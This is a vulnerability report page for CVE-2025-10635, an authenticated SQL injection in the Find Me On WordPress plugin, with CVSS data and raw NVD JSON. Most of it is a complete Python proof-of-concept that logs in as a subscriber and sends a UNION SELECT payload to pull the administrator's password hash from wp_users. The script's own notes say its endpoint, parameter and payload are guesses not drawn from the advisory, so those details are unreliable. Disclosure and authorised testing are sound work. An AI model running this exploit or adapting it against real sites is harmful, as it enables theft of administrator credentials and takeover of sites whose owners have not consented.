Security Vulnerability Report
CVE-2025-10635 CVSS 7.7 HIGH

CVE-2025-10635

Published: 2025-10-08 06:15:34
Last Modified: 2026-04-15 00:35:42

Description

The Find Me On WordPress plugin through 2.0.9.1 does not sanitize and escape a parameter before using it in a SQL statement, allowing subscribers and above to perform SQL injection attacks

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available from NVD for this entry (the record's vulnStatus is "Deferred"); the affected range below is taken from the advisory text, not from NVD configurations.

WordPress Find Me On plugin <= 2.0.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only; run it solely against systems you are explicitly authorized to test. Note that the advisory only says "a parameter" reaches a SQL statement unescaped — it does not name the vulnerable page, query parameter or request, so the endpoint and payload used in this PoC are assumptions that must be verified against the plugin source (or the WPScan entry) before being relied upon.
python
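# CVE-2025-10635 - Find Me On WordPress Plugin SQL Injection PoC
# Affected: Find Me On plugin <= 2.0.9.1
# Requires: Subscriber-level WordPress account
#
# NOTE(review): the public advisory only states that "a parameter" is used in a
# SQL statement without sanitization. The page slug, the `id` parameter, the
# `action` value and the payload below are carried over from the original PoC
# as ASSUMPTIONS -- they are not taken from the advisory. Confirm them against
# the plugin source or the WPScan entry before relying on this script.
import re
import sys
from typing import Optional

import requests

# Credentials travel in the clear over http://; prefer https:// where the target offers it.
TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "subscriber_password"

# Assumed location of the vulnerable handler (see NOTE above).
PLUGIN_PAGE = "/wp-admin/admin.php?page=find-me-on"
# Assumes the default `wp_` table prefix and that user ID 1 is the administrator;
# both are installation-specific and may need adjusting.
SQL_PAYLOAD = "1 UNION SELECT user_pass FROM wp_users WHERE ID=1-- -"
# WordPress nonces are lower-case hex; the original regex is kept unchanged.
_NONCE_RE = re.compile(r"_wpnonce=([a-f0-9]+)")
# phpass hash as stored in wp_users.user_pass: "$P$" followed by 31 chars.
_PHPASS_RE = re.compile(r"\$P\$[A-Za-z0-9./]{31}")
# Every request in the original was issued without a timeout and could hang forever.
TIMEOUT = 15


def login(session: requests.Session, base_url: str, username: str, password: str) -> None:
    """Authenticate *session* as a subscriber via wp-login.php.

    The login page is fetched first so the ``wordpress_test_cookie`` is present:
    wp-login.php rejects a POST that carries ``testcookie=1`` without it. The
    original script skipped this GET and also never checked whether the login
    worked (a bad password comes back as HTTP 200 with the form again), so every
    later step ran unauthenticated and ended in a misleading "no hash found".

    Raises:
        RuntimeError: if no ``wordpress_logged_in_*`` cookie is returned.
    """
    login_url = f"{base_url}/wp-login.php"
    session.get(login_url, timeout=TIMEOUT)
    login_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": f"{base_url}/wp-admin/",
        "testcookie": "1",
    }
    session.post(login_url, data=login_data, timeout=TIMEOUT)
    if not any(c.name.startswith("wordpress_logged_in") for c in session.cookies):
        raise RuntimeError("login failed: no wordpress_logged_in cookie returned; check credentials")


def fetch_nonce(session: requests.Session, base_url: str) -> str:
    """Return the ``_wpnonce`` value embedded in the plugin page.

    Raises:
        RuntimeError: if the page carries no nonce, instead of silently sending
            an empty one as the original did (WordPress would then reject the
            request and the failure would surface only as "no hash found").
        requests.HTTPError: if the page itself is not reachable (e.g. 403/404,
            which usually means the plugin is absent or the page slug is wrong).
    """
    response = session.get(base_url + PLUGIN_PAGE, timeout=TIMEOUT)
    response.raise_for_status()
    match = _NONCE_RE.search(response.text)
    if match is None:
        raise RuntimeError("no _wpnonce found on the plugin page; is the plugin installed and the page slug correct?")
    return match.group(1)


def send_payload(session: requests.Session, base_url: str, nonce: str, payload: str) -> requests.Response:
    """Issue the injection request and return the raw response.

    The status is deliberately not raised on: a 500 from a broken query is itself
    useful feedback and is printed by the caller.
    """
    params = {"id": payload, "_wpnonce": nonce, "action": "delete"}
    return session.get(base_url + PLUGIN_PAGE, params=params, timeout=TIMEOUT)


def extract_hash(body: str) -> Optional[str]:
    """Return the first phpass (``$P$``) hash found in *body*, or None."""
    match = _PHPASS_RE.search(body)
    return match.group(0) if match else None


def main() -> int:
    """Run the PoC end to end; exit status 0 when a hash was recovered, 1 otherwise."""
    session = requests.Session()
    login(session, TARGET_URL, USERNAME, PASSWORD)
    nonce = fetch_nonce(session, TARGET_URL)
    response = send_payload(session, TARGET_URL, nonce, SQL_PAYLOAD)
    print("[*] Response status:", response.status_code)
    print("[*] Extracted admin hash from response:")
    leaked = extract_hash(response.text)
    if leaked is None:
        print("[-] No hash found, payload may need adjustment")
        return 1
    print(f"[+] Admin Password Hash: {leaked}")
    return 0


if __name__ == "__main__":
    sys.exit(main())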

References

https://wpscan.com/vulnerability/92e965aa-45fc-4189-a341-1ecac656ebf3/ (WPScan advisory — the only reference carried in the NVD record below)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10635", "sourceIdentifier": "[email protected]", "published": "2025-10-08T06:15:33.527", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Find Me On WordPress plugin through 2.0.9.1 does not sanitize and escape a parameter before using it in a SQL statement, allowing subscribers and above to perform SQL injection attacks"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "references": [{"url": "https://wpscan.com/vulnerability/92e965aa-45fc-4189-a341-1ecac656ebf3/", "source": "[email protected]"}, {"url": "https://wpscan.com/vulnerability/92e965aa-45fc-4189-a341-1ecac656ebf3/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}